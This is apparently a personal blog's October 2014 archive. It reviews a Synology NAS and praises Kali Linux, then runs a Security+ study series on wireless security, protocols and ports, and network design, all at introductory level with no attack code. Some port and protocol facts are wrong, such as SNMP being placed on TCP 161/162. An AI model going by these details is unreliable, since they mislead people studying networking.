Monthly Archives: October 2014

Home NAS Solution

You know the drill, you working on something big, create a lot of useful notes, diagrams mind maps and than B-a-a-a-a-m. It is all gone, your hard drive failed, you lost all your work, go figure.

Or another case, again, you are up to something, you start at work create some files, and you get home, and ups, files are on your work notebook, you are tired to email stuff all the way around and you did not used sneaker net to carry them in our packet.

Clearly there must be a better way to manage and protect all that data you hamstered during the years. Sure you can use DropBox, Google Drive or other service but in that case you effectively giving all your data to these companies who god knows do with them.

These and other reasons led me to purchase a NAS solution for my home. I was looking for a solution that would be feature rich, power efficient and easy to manage. First I though I will put it together by myself from spare parts and base linux, but after some research I decided to go the commercial way.

I have chosen Synology Disk Station DS213j and after few months I must say it was an excellent choice. It is based on DSM5 operating system which very extensible through software packages. I did not measured the power consumption myself but according Synology this NAS consumes 3.65W at standby, and 19.82W at duty. The management part is also well executed, you have option to manage device itself via nice web GUI and there are also useful application for IOS to easily access your content.

DS213j has very sleek design.

For the actual hard drives I went with two Western Digital RED 3TB configured for Synology Hybrid RAID. This configuration provides 3 TB of protected storage. WD’s RED edition are optimized for small NAS deployments and they perform well so far.

WD’s REDs are cool for your home NAS

Overall, I am very glad that I moved to this solution. I am using it for backups, file sharing, file synchronization, video and audio streaming and VPN tunnel termination. I can even initiate a remote download through cool IOS app, and when I get home files are already available for streaming.

Advertisements

Hacker’s Swiss knife

Kali Linux, previously know as Backtrack is a security distribution created by some very clever people at Offensive Security. It is supported on many different platforms from classic x86 computers, tablets, smartphones and even arm-based systems like Raspberry PI.

Kali contains a tremendous number of security tools for every stage of penetration testing. From service fingerprinting, enumeration, password cracking, wireless attack tools, sniffing, spoofing, reporting and the list goes on an on.

Kali contains more tools than this Swiss knife

Knowing these tools and techniques not only re-enforces your knowledge about security, but also helps you get the necessary hands on practices so you will know how to protect your environment from real threats.

Dragon, well known Kali Linux theme

There are excellent number of resources located that offensive-security site. They have articles, forums, free videos and top paid courses. I once gone through online course with Mati Aharoni aka. muts who demonstrated how real penetration testing is done. At that time it was a huge inspiration for me, and it was also the same time I discovered an amazing band called Infected Mushrooms and their mind-blowing song Suliman.

IP Subnetting 101 – The Mission X

Subnetting is fundamental skills that every network “pro” should know. For everyone that want to get better while having fun there is superB game from Cisco called Subnet Game. It requires a cisco login, if you don’t have one just take some extra minutes it is worth it!

In this game you are a secret agent and your mission is to subnet Area 51, so expect some alien high tech stuff, go and show them who is the boss.

Screen Shot 2014-10-13 at 19.08.21

Go agent, subnet the shit out of the aliens!

Security+ Series Part 5: Wireless Security

Wireless networks are celebrating huge success these days. They are available almost everywhere from businesses, metro stations, bars, coffee shops to our homes. They connect million of devices – phones, tablets, notebooks, thermostats, televisions and the number is growing. Often security of these networks are overlooked or ignored and expose them to various types of attacks. The motivation may differ from simple free  Internet access to intentional targeted attacks. Although it might not sound scary on the first sight, once you gain access to wireless network you can pull another form of attack, for example ARP spoofing or DNS spoofing.

Random Trivia: Delain playing during post creation.

Disabling SSID Broadcasting

One of the common misunderstanding out there is the fact that when you disable SSID broadcasting you are more secure. It is good to do so if you choose but bear in mind that it will not stay hidden from someone who intentionally scans the radio frequency environment with tools such as inSSIDer or Aircrack-ng.

inSSIDer is useful too for RF analysis. It discovers nearby wireless networks.

MAC Filtering 

Stepping one step up in the security ladder we have MAC address filtering. Fundamentally how this feature works is allows only MAC addresses which are defined in database. This DB can be right on access point or wireless LAN controller. This approach is not very secure and it should not be your primary tool for defense. MAC address can be easily spoofed.

Changing MAC address with MacAppStuff is easy cheese

WEP 

Wired Equivalent Privacy is a wireless network security standard introduced in 1999. Wireless network at that time gained significant popularity and everyone wanted to have one. The main purpose of WEP was to bring data confidentiality and integrity. To achieve this, WEP uses RC4 stream cipher and CRC32 for checksum. WEP uses same key for authentication and encryption. Throughout the years, it was revealed that WEP is no longer secure anymore and is susceptible to multiple forms of attacks because of the weak initialization vector. If the attacker has enough captured packets he can retrieve the original key. We will look at some attacks on WEP network in Offensive Security Series, which is coming soon. If you must use WEP for example to support old bar-code scanners, terminate this network at firewall and allow only required minimum services.

WPA

Wi-Fi Protected Access was introduced in 2003 by a Wi-Fi Alliance to quickie WEP’s weaknesses. The idea was to use same hardware but provider better security. It would be implemented through firmware upgrade. What WPA brings to the table is Temporal Key Integrity Protocol (TKIP) which uses dynamic 128-bit key for each packet. WPA also implements message integrity check to prevent against anti-replay attacks. Unfortunately WPA is also susceptible to some forms of attacks such as re-injection and spoofing, however it is still better choice than WEP.

Aircrack-ng in action, pwning your favorite password.

WPA2

Wi-Fi Protected Access 2 brings new encryption. It was introduced in 2004 and for WEP capable devices it would require a hardware upgrade because of the improvements. It uses Counter Mode Cipher Block Chaining Message Authentication Code Protocol or simply CCMP with AES.

CCMP is an encryption protocol that is part of 802.11i standard. It offers enhanced security compared to TKIP. It uses 128-bit keys and 48-bit IV to mitigate reply attacks.

You must know that WPA or WPA2 with pre-shared keys are still susceptible to attacks when weak or predicable pass-phrase is used. An attacker could possible crack password with good wordlist or brute force attack. Aircrack-ng is one of most favorite tool set to penetrate wireless networks.

WPS

Wi-Fi Protected Setup was introduced in 2006. It purpose was help securing wireless networks without requiring user to know all moving parts underneath. You usually activate this feature physically on wireless router itself or in web GUI and it will help you pair new device. Although this worked well, later in 2011 a security flaw was found in this implementation, which would allow attacker to recovery the WPS PIN using brute force attack.

See the blue button with arrow signs underneath? That is used for WPS.

EAP

Extensible Authentication Protocol is a framework. It is used in most enterprise wireless deployments. It provide a means of transporting key materials and parameters used by various EAP flavors such as PEAP, LEAP, or EAP-TLS. EAP can be used with WPA or WPA2 to provide better authentication and key management.

As you see the limitation of WPA or WPA2 with pre-shared key is the fact that they use pre-shared key. It is one key for everyone. Imagine that you have contractor in office who work for you temporarily, you need to grant him access to be able to work. However once he is finished, you do not want to change the pre shared key every time to keep network security high. That is why in enterprise we need a more advanced method for authentication. When EAP is used over LAN or WLAN network it is referred to as 802.1x.

PEAP

PEAP stands for Protected Extensible Authentication Protocol, it was developed big players in industry Cisco, Microsoft and RSA Security to address security weaknesses in WEP. It is yet another way how to encapsulate EAP frames. PEAP authenticate server with digital certificate and carries data in TLS tunnel.  Each host receives unique encryption key used with TKIP to provide data confidentiality. This protocol meant to replace Cisco’s proprietary LEAP.

LEAP

Lightweight Extensible Authentication Protocol was developed for Cisco by Cisco. It also uses dynamic WEP keys which are changing over time. However LEAP relies on MS-CHAP which did not offer strong protection of credentials.

EAP-TLS

One of the most popular and widely used flavor of EAP.As the name says it uses Transport Layer Security. It requires digital X.509 certificate present on authentication server as well as on client.

Captive portals

Captive portals are excellent choice for wireless guest access. The way it works is that in your office you have an open SSID for example CompanyX-Guest. This network has no authentication, everyone can connect. Once they are connected they redirected to web page which has information about usage policy that need to be accepted. Often a username and password is required for tracking purposes. A receptionist or ambassador who takes care of his guest. During guest account creation there is an option to set the duration that this account will be valid. For example 8 hours.

Starbucks uses captivate portal before letting you on dark net. Enjoy your coffee

VPN (over open wireless)  

You are in the coffee shop enjoying your latte connected to Starbucks Free Wi-Fi and everything is hunky dory. It is it? Think about it for a minute, no authentication, no encryption, is your communication really confidential? Well it depends :-). You could be protected by other protocols like SSL/TLS for example when you visiting https web sites. For application that do not use any additional level of security, their traffic is visible on these wireless networks.

For secure corporate access this may impose a risk. Therefore it is recommended to use IPSec or SSL VPN over these unsecured wireless networks. I use this approach all at he time to secure my communication or bypass site restrictions.

Antenna Placement and Types 

Although antenna placement is not only security related. It does what tools the attacker has,  if he has really bad or no signal he will be very frustrated. by selecting the right antenna for your deployment you can increase security of the environment. Some popular antenna types include bidirectional, directional and yagi. By adjusting power controls you can also right-size the coverage.

Antenna is like water hose, it can focus signal in right direction.

Wireless site survey 

Wireless site survey is the first step for proper wireless network deployment. Its role is to closely map environment form radio frequency point of view. It identifies what areas needs to covered and makes sure that signal levels are acceptable. Voice Wireless network have more strict requirements. Wireless signals are susceptible to many form of interference, for example evaluators or microwave ovens  may cause pose a problem. The output of survey will include heat maps, recommended access point models, their radio power settings and antenna types.

Cisco Wireless Control System can help you perform a predictive site survey.

And with that last piece of information this post came to the very end. I hope you had learned something new while having fun, because that is the whole point. The information summarized here can help you pass the Security+ exam but the real value is to use these skills in real world.

In next part we will look at Compliance and Operational Security. Until then, take care and spread the words.

Security+ Series Part 4: Protocols and Ports

Welcome back to part 4 of security+ series. As promised in this part we are going to look at protocols and ports our apps use to communicate across network. Without any further trash talk, lets get started.

IPSec

I mentioned IPSec when we described Virtual Private Networks. Generally it is not just single protocol, rather than a protocol family. The IPSec’s job is to provide authentication, confidentiality, integrity, and anti replay protection for traffic that is on the move from one point to another.

To achieve authentication, several methods can be used. From simple pre-shared keys, RSA signatures to digital certificates.

Data confidentially is definitively a high priority. IPSec can utilize industry grade standard protocols such as DES, 3DES or AES. Advanced Encryption Standard is most recent it is recommended among the three. The way it works is IPSec will wrap your data into Encapsulated Security Payload and encrypt everything inside, therefore a middle man would have a hard time to putting the original message together.

Message Integrity checks that no one tampered with your payload during transit. For this purpose, hashing algorithms are used. They perform a one-way mathematical function on data and spill out a unique string of characters – hash. The receiving party will run the same algorithm against data and compare the hashes. If they match, data did not changed. Most popular hashing standards are MD5 and SHA.

Frenzy, one of decepticons steals data from Air Force One, and sends them to Megatron over an IPSec tunnel. Feds have no clue what they are cooking out there.

SNMP

Simple Network Management Protocol, or known by name Security is Not My Problem is used for network device management. It uses a put and pull model. Every value in device is stored in Management Information Base – MIB. These MIBs have a structure. A value can anything from CPU utilization, RX/TX rate on an interface, or even a password. These value are protected by read-only or write community strings. SNMP is used my management solutions such as Cacti, Cisco’s Prime Infrastructure and many others.

These guys get their favorite monitoring sitcom via SNMP.

The bad thing about SNMP version 1 and version 2c is they are not encrypting any communication between server and SNMP agent (device). If some one would play a man in the middle game and they could easily get the strings and that is game over my fiends.

It is recommends to use version 3, which adds more robust authentication mechanisms as well as encryption and message integrity. Add an access control list on top of that and you are on the right track. SNMP uses TCP port 161 for GET/SET operations and TCP port 162 for Traps.

There are more options how to manage security devices. An example is Security Device Event Exchange (SDDE). SDEE uses TCP port 443.

SNMPwalk pulling stuff out of a box.

Telnet

Telnet a legacy protocol but still used on lot of networks for remote device administration, or watching cool movies. It was invented back in 1968. It is lightweight and it does not provide any data confidentiality. It is not recommended to use Telnet anymore, SSH is better option. Telnet uses TCP port 23.

Start Wars Episode IV ASCII edition. This is how new Episode VII will be shot.

SSH

Secure Shell, is most widely used remote access protocol in the wild. It brings encryption to the table and is used for remote access device management. An engineer would use it to connect to remote router or a scripting tool can use it to perform repeatable tasks on the box. Most popular SSH clients include Putty and SecureCRT. SSH uses TCP port 22.

Putty is simple and very customizable and free.

RDP

Remote Desktop Protocol is often used for remote graphical administration of Windows based systems. It was developed by Microsoft and provides data confidentiality and authentication using TLS from version 5.2. The server listens on TCP port 3389.

Connecting to NSA surveilance server via RDP

I am connecting to remote server in NSA domain

DNS

Without DNS there is no Internet, and without Internet there is no DNS. The Domain Name System plays huge role. It helps us translate human readable names into IP addresses. For example when you hit google.com, are really connecting to one of many addresses that they service is running on. DNS can also be used form load-sharing.

There are two types of DNS traffic out there, client-server, this uses UDP port 53. And server-to-server traffic e.g. zone transfer, this uses TCP port 53. It is important to keep DNS secure and available. Many other things depend on it.

DNS packets displayed in popular traffic capture tool Wireshark.

SSL

Secure Socket Layer is protocol used for encrypting connections over the Internet. For example It is used when you communicate with your bank or social network. You can see the presence of this layer in your browser, often noted by a lock or https prefix in URL. SSL negotiate secure connection between two parties, client and server negotiate what kind of encryption, hashing, and authentication will they use. This security model is tightly related to Public Key Infrastructure – PKI. We will touch on this more in later parts. Besides HTTPS TCP port 443 other protocols can take advantages of SSL service.

Screen Shot 2014-10-12 at 17.07.19

Bank uses digital certificate to proof its identify and build secure connection

TLS

Transport Layer Security is also a cryptographic protocol as SSL. It is an open standard successor, created by IETF. It operates very similarly to SSL, and may see these terms often interchanged. Client and server can negotiate which protocol they are going to use SSL or TLS.

Bank's digital certificate details.

Bank’s secure connection details.

TCP/IP

The famous TCP/IP started it all. The term refer to protocol stack naming two most used protocols which work together. Transmission Control Protocol take care of reliable packet delivery, sequencing, flow control and session multiplexing. The Internet Protocol on the other hand handles logical addressing and routing.

TCP/IP are like characters in Army of Two. The work with each other.

IPv4

Internet Protocol version 4 is in charge of logical addressing. The most common analogy to this protocol is your mail address. For someone to send you a letter, they need to know you address. They write this destination address on an envelope along with source address, in case you wanna reply to letter. IP does the same except it does use numeric 32 bit values.

For use humans it would be hard to remember an address like this

11001100100001000010100010011011

Therefore we tend to divide this number into octets or group of 8 bits. Like this

11001100.10000100.00101000.10011011

And then convert each group of 8 bits into decimal. This gives us IP address:

204.132.40.155

IP address are then divide into Network and Host portion. Routers works with this information to route packet to right way, same way as mail services routes letters. Besides logical addressing, there are some extra features in IPv4 header like error checking and options.

IP packet is like a letter. It has it source and destination address.

IPv6

The next generation Internet Protocol brings extended address space and more efficient header usage. It is twice as big as IPv4 header, 40 Bytes. It provides 128-bit dressing space, which is huge extension. It provides 2^128 = 340,282,366,920,938,463,463,374,607,431,768,211,456 addresses.

The header it self was rewritten to omit some fields like fragmentation, header checksum and added fields called Flow Label and Next Header. The header it self is much more modular now.

IPv4 vs. IPv6 Header

FTP

File Transfer Protocol is one of oldest protocols out there. The original publication is dating back to 1971. The protocol name says it for itself. It uses TCP port 20 and 21, it does not provide any data confidentiality.

FTPS

Remember when I told you about SSL/TLS and that they service can be used by other protocols? That is exactly what is happening here. File Transfer Protocol over SSL would use them secure data in transit. This is different that Secure File Transfer Protocol. It is not used very often in the wild. There are better ways.

SFTP

SSH File Transfer Protocol is an extension to classic SSH protocol. It uses same mechanisms but is generally used for file transfer. whether classic SSH is used for remote administration via CLI. It uses TCP port 22.

TFTP

Trivial File Transfer Protocol is the last flavor which we mention. As name says, it is very lightweit and simple. Offers no authentication, encryption or data reliability. It leverages UDP port 69. It is often used in IP telephony where phones use it to download firmware. Most embedded systems also support this protocol for reasons mentioned earlier.

TFTP is lightweight like these shoes

HTTP

Good old buddy Hyper Test Transport Protocol has been around since 1991. It is an application layer protocol used to request various types of resources from simple text-based HTML pages to multimedia. It defines message types, response codes, basic authentication, caching and more. By default it uses TCP port 80.

HTTPS

Another case with using SSL/TLS secure services. Original HTTP is plain text communication, therefore needs another protocol to secure its communication. As mentioned HTTPS rides on TCP port 443.

HTTPS uses SSL/TLS to secure your data

SCP

Secure Copy Protocol uses same mechanism for authentication, encryption and hashing than SSH can use. It provides just another way how to transfer files securely.

ICMP

Internet Control Message Protocol was invented to provide control services for IP. One of the most used protocols in the world are in fact using ICMP. They are the famous ping command and also some implementations of traceroute.

ICMP is often used in monitoring systems to determine system availability. The management station would sent an ICMP Request in regular intervals and expect and ICMP Reply. Often firewalls do not permit this type of traffic because of higher security risk of network reconnaissance – mapping whats alive on the net.

Valve Portal’s turret uses ICMP to check if you are alive.

SMTP

Simple Mail Transfer Protocol is used to carry out email messages from one email server to another. SMTP uses TCP port 25. There is also a flavor of SMTP that uses TLS called SMTPS and it uses TCP port 465.

POP3

Post Office Protocol is also used in email communication, introduced in 1984. It is used by email client to retrieve message from server. It supports download and delete actions for simple mail manipulation. Usually a client would connect, download the message and delete it from server. POP service listens on TCP port 110. This protocol can provide confidentiality using TLS, in that case it runs on TCP port 995.

Good luck reading the mail.

IMAP

Internet Message Access Protocol, has similar function as POP but brings additional features. IMAP client can send complex queries, for example retrieve just email header information. It supports online and offline type of operation. Plain IMAP runs on TCP port 143 and the flavor that uses TLS for security uses TCP port 993 (IMAPS).

Microsoft Outlook is popular POP3/IMAP client

iSCSI

SCSI stands for Small Computer System Interface. It is used to interact with storage device such as hard drive. It can be used over network hence the name (Internet)SCSI to interact with remote storage device at block-level. iSCSI client is referred as initiator and remote storage is often called target. It is commonly used in small scale Storage Area Network deployments. Storage servers can offer higher reliability and data protection through technologies such as RAID. These networks have higher demands on bandwidth and reliability than other types of traffic.

Clients disks appear like they are directly connected. But in fact they are located on iSCSI target (server).

Fibre Channel

Fibre Channel is another technology used to access remote storage at block level. FC uses dedicated Host Bus Adapters on servers side that connect to Fibre Channel Switches which also connect storage appliances that contain various disk types, Solid State Drives, SAS Drives, SATA Drives and Tape Libraries. Fiber Channel technology is pretty costly compared to iSCSI.

EMC storage array.

FCoE

Historically data and storage operated over two distinct physical networks. The reason was that storage traffic has different requirements for transport, and it usually requires a high speed links 4,8 or 16Gbps. As 10Gbps Ethernet evolved and matured, a new flavor of FC was introduced. Fiber Channel over Ethernet can use same infrastructure for data and storage traffic. FC frames are encapsulated into Ethernet frames and receive special treatment from transport fabric.

This can reduce CAPEX and OPEX expanses since you no longer need to have separate data and storage connections to servers and separate data and storage switches.

NetBIOS

Network Basic Input Output System  is a legacy protocol used in windows-based networks. It uses several services, for example name services run on UDP137, data gram services UDP 138 and session services on TCP 139.

used in windows network all ows PC to communicate, UDP 137 (name services) UDP138 (data gram services) TCP 139 (session services)

And that my friends is the of this post. I would not think at the beginning that this will be so long, if you made till the end, you have my praise. Stay tuned for next post in the series that will cover Wireless Security.

Hellbound Hackers

Few years back when I was god damn kid a friend of my told me about the site hellboundhackers.org. This site is so much fun. Besides large article base, it has numerous security challenges in different areas, from basic web hacking, java script hacking, encryption, timed, real world and steganography are on the list.

Going through the challenges teaches you about different vulnerabilities that are out there. And how to fix them – application patching challenges.

So go now, learn and exploit them already!

“Behind this mask there is more than just flesh. Beneath this mask there is an idea… and ideas are bulletproof.”

Security+ Series Part 3: Network Security Design

In the part of the Security+ series we are going to dive into design best practices. You may be already familiar with some of terms from previous posts therefore we are going to build on top of those. The exam version SY0-401 also touches cloud computing concepts, so made sure to include those as well.

DMZ

A Demilitarized Zone has origins in military and describes a neutral area for both fighting parties. The same concept is used in computer networking, where this area holds services that are accessible, both from the Internet as well as Intranet. You can further divide DMZ into sub-DMZs for example, a Web Proxy Appliance can be in one zone, and your e-commerce servers can be in different zone. Each zone can have its own policies. DMZs are typically connected to firewall which enforce these policies. Inside a DMZ you can use other security technologies for further isolation, for example Private VLANs.

DMZ between North Korea and South Korea.

Subnetting

Subnetting is easy like Jackson Five’s ABC. Definitely one of the favorite topics in CCNA Routing and Switching or Compia’s Network+. What subnetting does, is it breaks a large chunks of address block into smaller more manageable pieces. For example you could use a private address space 10.0.0.0/8 for your company and start to divide that into subnets, one block would be used for data center (a.k.a Willy Wonka’s data factory) would receive 10.0.0.0/16, your regions would get 10.1.0.0/17 and 10.1.128.0/17 and so forth. The key here is to plan ahead, otherwise you will have a mess in your IP address management – IPAM.

Subletting is like dividing a cake.

VLAN/PVLAN

Virtual Area Networks have been around for many years, they are so obvious that no one really thinks about them as visualization technology, but in fact they are. VLAN is an equivalent of broadcast domain, it provides separation on L2. It became popular after we started to push a lot of different types of traffic onto our network. Therefore not only data traffic was riding on our switch links but also voice and video traffic. To be able to communicate between VLANs we need a L3 device, multilayer switch, router or even firewall will do well.

Concept of VLAN have been later extended to include a feature that would protect between users in same VLAN. The idea is useful for example in hotels, where all guests sit on same VLAN but you need to ensure that they cannot talk to each other directly. The extension is called Private VLAN.

NAT

We already briefly touched NAT in previous post. NAT was invented to slow down the depletion of IPv4 address space. Since IPv4 addresses are “only” 32 bit long, there is finite number hosts that can access the public Internet. The idea is that inside our organization, we would use a private address range, like 10.0.0.0/8 but when we would like to access resource on internet we would translate our source address into public one assigned by service provider. Since many organization have thousand hosts inside and just a few public IPs, we need to do port multiplexing or overloading. This feature is called Port Address Translation – PAT. NAT/PAT is also used when companies merge and they have overlapping address space.

Remote Access

Internet is fundamentally changing the way we communicate. One of the features that many companies use is remote access. The idea here is that an employee or partner connected to Internet would create a secure tunnel to our corporate network. All communication within this tunnel is encrypted. IPSec is one the famous protocol stack that is used for this purpose. It contain many different pieces for this to happen. There are however other emerging technologies that simplify configuration of tunnels, namely SSL/TLS VPN. We will dig deeper into this area later in series.

These guys are stuck at airport. They could get some VPN magic rolling to get the job done.

Telephony

Since the time voice services joined data on same transport network, we also must take caution protecting this type of communication. Fundamentally, it is good idea to put IP phones in separate VLAN and harden it with protocols we mentioned previously. Optionally encryption can be used for voice barrier to prevent against eavesdropping. QoS is also essential to protect these little voice fellas in transit against DoS. On the other side of control plane, call processing servers, voice mail servers need the right level of security.

Get this retro IP Phone and people will be like Whaaaat?!

NAC

Network Admission Control is feature allows you to perform a security posture on hosts that is trying to access the network. For example it will only allow access if the OS security patches are current, malware protection is enabled, host intrusion prevention system is active, disk is encrypted and so on. If that is not true, it can moved client to remediation VLAN where it can receive all patches.

Lucky enough, NAC deals with computers.

Virtualization

Oh boy, this is a BIG one on my list. Server virtualization fundamentally changed the way we utilize hardware resources. In past, we had a model where one business app would ride on an OS and this OS would be installed directly on physical machine. It was is cumbersome, slow process. Just think how much would you wait for hardware itself.

Virtualization introduce a new layer between hardware and operating system. This layer is referred as hypervisor. Hypervisor can abstract physical resources underneath, therefore we can now run many Virtual Machines – VMs on single server. And that was just beginning, we can take pool of physical servers and cluster them, so if any of them fails we move workload somewhere else.

Image that you could do same with networking. Stay tuned for NSX series, you will love it.

The picture says it all.

Cloud Computing

The and the winner of 2013/2014 buzzword is… Cloud Computing. This is one of most abused term out there. What marketing departments did with it is beyond imagination.

To bring same value to this term back, cloud is not really new, it has been around for many years, just nobody called it that way. Essentially a cloud is a resource that located somewhere else. So even Willy Wonka’s traditional data factory can be a cloud with some additional services such as Pay As You, or utility based computing – same model as electric energy, water or gas has today.

See. They measure your actual usage. How clever.

SaaS

A Software as a Service term was born when companies such as Google, Amazon, and Microsoft start to offer traditional software as a…service. You got it! The main point is, that you do not own or maintain hardware, operating systems that these run on, you just use the app. Examples include Office 365, SalesForce, Gmail, even WordPress is a SaaS.

MaaS

This one made me laugh, as you can offer almost anything as a service. So a Monitoring as a Service was born. For example, Cisco offers a cloud wireless solution called Meraki. They will ship you a bunch of lightweight access points and they will be managed from controller sitting in their data center.

Cisco Meraki Access Points. Thumbs up for clean design.

PaaS

Moving one layer below SaaS, you find Platform as a Service. In this model, provider provides you with hardware and operating system and perhaps a development environment. Out there in the wild some known PaaS providers are Google App Engine, Amazon Elastic Beanstalk, Microsoft Azure, HP Cloud. The number is growing.

IaaS

Infrastructure as a Service moves another layer below. The provider will provide hardware and hypervisor. It is up to you to build and spin virtual machines on top them. This is very extendable, you can use predefined virtual machines from market, or you can build an application blueprints and create entire application stacks very quickly. One such example include Sharepoint Reference Architecture. The list of providers include major names players – Google, Amazon, Microsoft, Vmware, HP, Rackspace and many more.

Cloud Ownership

Depending on implementation and ownership you can choose between various cloud models

  • Private – built in house, you manage hardware, hypervisor, os and applications
  • Public – resources rented from cloud provider, responsibilities depending on type (SaaS, PaaS, IaaS)
  • Hybrid – a combination of two above
  • Community – multiple internal customers using same platform, for example government agencies

Who has the keys to your kingdom?

Defense in Depth

Defense in depth is concept where you implement security mechanisms at multiple places. Starting at user level with training, moving to host security, switch security, firewall security and so one. This approach decreases the likelihood of being compromised.

With defense in depth our network is like fortress.

And with that my friends we are at the end of this part of series. I hope you enjoyed it and learned something new. See you in next part which will spin around Protocols and Ports.